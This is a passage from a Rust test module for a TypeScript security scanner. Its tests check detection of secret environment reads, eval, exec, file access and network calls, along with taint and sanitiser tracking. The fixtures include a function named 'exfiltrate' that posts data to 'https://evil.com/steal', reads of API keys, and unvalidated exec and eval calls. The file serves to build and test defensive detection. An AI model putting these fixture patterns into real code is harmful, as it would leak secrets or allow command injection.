            parsed.network_operations[0].url_arg,
            ArgumentSource::Literal(_)
        ));
    }

    /// Both bracket-style and dot-style `process.env` reads are recorded, and
    /// both of these variable names are flagged as sensitive.
    #[test]
    fn detects_env_var_access() {
        let code = r#"
const apiKey = process.env["OPENAI_API_KEY"];
const secret = process.env.AWS_SECRET_ACCESS_KEY;
"#;
        let parsed = TypeScriptParser
            .parse_file(Path::new("test.ts"), code)
            .unwrap();
        assert_eq!(parsed.env_accesses.len(), 2);
        assert!(parsed.env_accesses[0].is_sensitive);
        assert!(parsed.env_accesses[1].is_sensitive);
    }

    /// `eval(code)` with a function parameter yields one dynamic-exec entry
    /// whose argument is classified as `Parameter`.
    #[test]
    fn detects_eval() {
        let code = r#"
function execute(code: string) {
    eval(code);
}
"#;
        let parsed = TypeScriptParser
            .parse_file(Path::new("test.ts"), code)
            .unwrap();
        assert_eq!(parsed.dynamic_exec.len(), 1);
        assert!(matches!(
            parsed.dynamic_exec[0].code_arg,
            ArgumentSource::Parameter { .. }
        ));
    }

    /// A qualified `fs.readFileSync(path, ...)` call yields one file operation
    /// whose path is classified as `Parameter`.
    #[test]
    fn detects_file_operations() {
        let code = r#"
import fs from "fs";

function readConfig(path: string) {
    return fs.readFileSync(path, "utf-8");
}
"#;
        let parsed = TypeScriptParser
            .parse_file(Path::new("test.ts"), code)
            .unwrap();
        assert_eq!(parsed.file_operations.len(), 1);
        assert!(matches!(
            parsed.file_operations[0].path_arg,
            ArgumentSource::Parameter { .. }
        ));
    }

    /// Parameters of an arrow function assigned to a `const` are recognised,
    /// so `fetch(url)` inside it is classified as `Parameter`.
    #[test]
    fn detects_arrow_function_params() {
        let code = r#"
const handler = async (url: string) => {
    const resp = await fetch(url);
    return resp.text();
};
"#;
        let parsed = TypeScriptParser
            .parse_file(Path::new("test.ts"), code)
            .unwrap();
        assert_eq!(parsed.network_operations.len(), 1);
        assert!(matches!(
            parsed.network_operations[0].url_arg,
            ArgumentSource::Parameter { .. }
        ));
    }

    /// `axios.post(...)` yields one network operation marked as sending data.
    #[test]
    fn detects_axios_post() {
        let code = r#"
async function exfiltrate(data: string) {
    await axios.post("https://evil.com/steal", { body: data });
}
"#;
        let parsed = TypeScriptParser
            .parse_file(Path::new("test.ts"), code)
            .unwrap();
        assert_eq!(parsed.network_operations.len(), 1);
        assert!(parsed.network_operations[0].sends_data);
    }

    // ── Tests requiring tree-sitter AST (multi-line, TSX, accurate positions) ──

    /// An `exec` call whose arguments span several lines is still found, and
    /// its first argument is classified as `Parameter`.
    #[cfg(feature = "typescript")]
    #[test]
    fn detects_multiline_exec_call() {
        let code = r#"
function runCommand(command: string) {
    exec(
        command,
        { encoding: "utf-8" }
    );
}
"#;
        let parsed = TypeScriptParser
            .parse_file(Path::new("test.ts"), code)
            .unwrap();
        assert_eq!(parsed.commands.len(), 1);
        assert!(matches!(
            parsed.commands[0].command_arg,
            ArgumentSource::Parameter { .. }
        ));
    }

    /// A `fetch` call with a multi-line options object yields exactly one
    /// network operation whose URL is classified as `Parameter`.
    #[cfg(feature = "typescript")]
    #[test]
    fn detects_multiline_fetch() {
        let code = r#"
async function sendData(url: string) {
    const resp = await fetch(
        url,
        {
            method: "POST",
            body: JSON.stringify({ key: "value" }),
        }
    );
    return resp.json();
}
"#;
        let parsed = TypeScriptParser
            .parse_file(Path::new("test.ts"), code)
            .unwrap();
        assert_eq!(parsed.network_operations.len(), 1);
        assert!(matches!(
            parsed.network_operations[0].url_arg,
            ArgumentSource::Parameter { .. }
        ));
    }

    /// An `exec` call nested inside a `Promise` executor callback still
    /// resolves `command` to the outer function's parameter.
    #[cfg(feature = "typescript")]
    #[test]
    fn detects_nested_callback_exec() {
        let code = r#"
function runCommand(command: string): Promise<string> {
    return new Promise((resolve, reject) => {
        exec(command, (error, stdout) => {
            if (error) reject(error);
            resolve(stdout);
        });
    });
}
"#;
        let parsed = TypeScriptParser
            .parse_file(Path::new("test.ts"), code)
            .unwrap();
        assert_eq!(parsed.commands.len(), 1);
        assert!(matches!(
            parsed.commands[0].command_arg,
            ArgumentSource::Parameter { .. }
        ));
    }

    /// The reported line is 1-based and counts the fixture's leading blank
    /// line, so the `exec(cmd)` call is on line 5.
    #[cfg(feature = "typescript")]
    #[test]
    fn accurate_line_numbers() {
        let code = r#"
// line 2
// line 3
function dangerous(cmd: string) {
    exec(cmd);
}
"#;
        let parsed = TypeScriptParser
            .parse_file(Path::new("test.ts"), code)
            .unwrap();
        assert_eq!(parsed.commands.len(), 1);
        // exec(cmd) is on line 5
        assert_eq!(parsed.commands[0].location.line, 5);
    }

    /// A `.tsx` file containing JSX parses, and a destructured prop (`url`)
    /// passed to `fetch` is classified as `Parameter`.
    #[cfg(feature = "typescript")]
    #[test]
    fn handles_tsx_file() {
        let code = r#"
import React from "react";

const Component = ({ url }: { url: string }) => {
    const data = fetch(url);
    return <div>{data}</div>;
};
"#;
        let parsed = TypeScriptParser
            .parse_file(Path::new("component.tsx"), code)
            .unwrap();
        assert_eq!(parsed.network_operations.len(), 1);
        assert!(matches!(
            parsed.network_operations[0].url_arg,
            ArgumentSource::Parameter { .. }
        ));
    }

    // ── Cross-file support tests ──

    /// Function definitions are collected with their export status and
    /// parameter names: `readFileContent` is exported with `filePath`, while
    /// `internalHelper` is not exported.
    #[test]
    fn extracts_function_defs() {
        let code = r#"
export async function readFileContent(filePath: string) {
    return fs.readFile(filePath, "utf-8");
}

function internalHelper(x: number) {
    return x + 1;
}
"#;
        let parsed = TypeScriptParser
            .parse_file(Path::new("lib.ts"), code)
            .unwrap();
        assert!(parsed.function_defs.len() >= 2);
        let exported = parsed
            .function_defs
            .iter()
            .find(|d| d.name == "readFileContent");
        assert!(exported.is_some());
        assert!(exported.unwrap().is_exported);
        assert_eq!(exported.unwrap().params, vec!["filePath"]);

        let internal = parsed
            .function_defs
            .iter()
            .find(|d| d.name == "internalHelper");
        assert!(internal.is_some());
        assert!(!internal.unwrap().is_exported);
    }

    /// Calls to functions that match no dangerous pattern (here
    /// `readFileContent`) are still recorded as call sites.
    #[test]
    fn extracts_call_sites() {
        let code = r#"
async function handler(args: any) {
    const validPath = await validatePath(args.path);
    const content = await readFileContent(validPath);
    return content;
}
"#;
        let parsed = TypeScriptParser
            .parse_file(Path::new("index.ts"), code)
            .unwrap();
        assert!(!parsed.call_sites.is_empty());
        let rfc_call = parsed
            .call_sites
            .iter()
            .find(|cs| cs.callee == "readFileContent");
        assert!(rfc_call.is_some(), "Should find readFileContent call site");
    }

    /// A variable assigned from `validatePath(...)` is tracked in
    /// `sanitized_vars`, and passing it to a later call classifies that
    /// argument as `Sanitized`.
    #[test]
    fn detects_sanitizer_assignment() {
        let code = r#"
async function handler(args: any) {
    const validPath = await validatePath(args.path);
    const content = await readFileContent(validPath);
    return content;
}
"#;
        let parsed = TypeScriptParser
            .parse_file(Path::new("index.ts"), code)
            .unwrap();
        assert!(parsed.sanitized_vars.contains("validPath"));

        // The call to readFileContent(validPath) should classify validPath as Sanitized
        let rfc_call = parsed
            .call_sites
            .iter()
            .find(|cs| cs.callee == "readFileContent");
        assert!(rfc_call.is_some());
        let rfc = rfc_call.unwrap();
        assert!(!rfc.arguments.is_empty());
        assert!(
            matches!(&rfc.arguments[0], ArgumentSource::Sanitized { .. }),
            "validPath should be classified as Sanitized, got: {:?}",
            rfc.arguments[0]
        );
    }

    /// A variable assigned from `path.resolve(...)` is tracked in
    /// `sanitized_vars`.
    #[test]
    fn sanitized_var_from_path_resolve() {
        let code = r#"
function processFile(rawPath: string) {
    const safePath = path.resolve(rawPath);
    fs.readFileSync(safePath, "utf-8");
}
"#;
        let parsed = TypeScriptParser
            .parse_file(Path::new("test.ts"), code)
            .unwrap();
        assert!(parsed.sanitized_vars.contains("safePath"));
    }

    /// `URL.parse(...)` does not count as sanitisation: its result is not in
    /// `sanitized_vars` and stays tainted when passed to `fetch`.
    #[test]
    fn url_parse_assignment_is_not_sanitized_for_ssrf() {
        let code = r#"
async function handler(args: { url: string }) {
    const parsedUrl = URL.parse(args.url);
    return fetch(parsedUrl);
}
"#;
        let parsed = TypeScriptParser
            .parse_file(Path::new("test.ts"), code)
            .unwrap();

        assert!(!parsed.sanitized_vars.contains("parsedUrl"));
        assert_eq!(parsed.network_operations.len(), 1);
        assert!(
            parsed.network_operations[0].url_arg.is_tainted(),
            "URL.parse output must remain tainted for network sinks"
        );
    }

    /// A redaction helper does not count as path sanitisation: its result is
    /// not in `sanitized_vars` and stays tainted when passed to
    /// `fs.readFileSync`.
    #[test]
    fn redaction_assignment_is_not_sanitized_for_file_paths() {
        let code = r#"
function redactSecret(value: string): string {
    return value.replace(/secret/g, "[REDACTED]");
}

function handler(args: { path: string }) {
    const redactedPath = redactSecret(args.path);
    return fs.readFileSync(redactedPath, "utf-8");
}
"#;
        let parsed = TypeScriptParser
            .parse_file(Path::new("test.ts"), code)
            .unwrap();

        assert!(!parsed.sanitized_vars.contains("redactedPath"));
        assert_eq!(parsed.file_operations.len(), 1);
        assert!(
            parsed.file_operations[0].path_arg.is_tainted(),
            "redaction output must remain tainted for file path sinks"
        );
    }
}